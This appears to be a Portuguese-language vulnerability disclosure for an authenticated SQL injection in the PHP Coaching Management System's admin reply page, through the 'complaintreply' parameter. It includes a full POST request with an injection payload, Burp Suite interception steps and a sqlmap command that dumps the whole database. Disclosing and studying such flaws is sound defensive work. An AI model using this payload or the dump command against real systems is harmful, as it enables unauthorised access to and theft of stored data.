
Prova de conceito para injeção SQL autenticada no Coaching Management System, demonstrando dump do banco de dados por meio do parâmetro não sanitizado complaintreply.
Existe uma vulnerabilidade de Injeção SQL no Sistema de Gestão de Coaching em PHP. O parâmetro complaintreply na funcionalidade de resposta do administrador não é devidamente sanitizado antes de ser utilizado em consultas SQL. Um atacante autenticado (Administrador) pode injetar consultas SQL maliciosas, levando à extração completa do banco de dados.
/cims/modules/admin/reply.phpcomplaintreplycode-projects.org
Sistema de Gestão de Coaching em PHP https://code-projects.org/coaching-management-system-in-php-with-source-code/
Desconhecida (Testado na versão mais recente disponível em abril de 2026)
O aluno submete uma reclamação 
O administrador abre a reclamação e acede à funcionalidade de resposta
POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded
complaintreply=' OR 1=1-- -&submit=submit

Intercetar o pedido via Burp Suite 
Injetar o payload:
'

Erro SQL observado
7. Confirmar a injeção:
' OR 1=1-- -

Extrair o banco de dados usando:
sqlmap -r sqli.txt --dump

Gravidade: CRÍTICA